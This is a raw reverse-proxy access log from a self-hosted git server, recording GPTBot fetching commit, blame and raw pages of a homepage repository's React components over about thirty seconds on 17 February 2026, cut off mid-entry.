+[17/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 13752] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" +[17/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" +[17/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" +[17/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16911] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" +[17/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" +[17/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 14927] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:13:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14265] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" +[17/Feb/2026:13:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15869] [Gzip 7.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16878] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" +[17/Feb/2026:13:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 14961] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:13:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" +[17/Feb/2026:13:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" +[17/Feb/2026:13:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:13:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:13:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" +[17/Feb/2026:13:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" +[17/Feb/2026:13:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" +[17/Feb/2026:13:18:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/" +[17/Feb/2026:13:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/weekly" [Client 74.7.227.38] [Length 8369] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13898] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:13:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11466] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 10563] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity" [Client 74.7.227.38] [Length 8586] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:19:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" +[17/Feb/2026:13:19:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" +[17/Feb/2026:13:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects" [Client 74.7.227.38] [Length 7763] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/watchers" [Client 74.7.227.38] [Length 7737] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/branches" [Client 74.7.227.38] [Length 10357] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:13:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:13:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10775] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" +[17/Feb/2026:13:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" +[17/Feb/2026:13:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16463] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/contributors" [Client 74.7.227.38] [Length 7615] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/code-frequency" [Client 74.7.227.38] [Length 7537] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/recent-commits" [Client 74.7.227.38] [Length 7524] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/monthly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14190] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15543] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 14804] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16466] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" +[17/Feb/2026:13:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" +[17/Feb/2026:13:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15538] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16465] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" +[17/Feb/2026:13:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:13:19:17 +0000] - 200 200 - GET 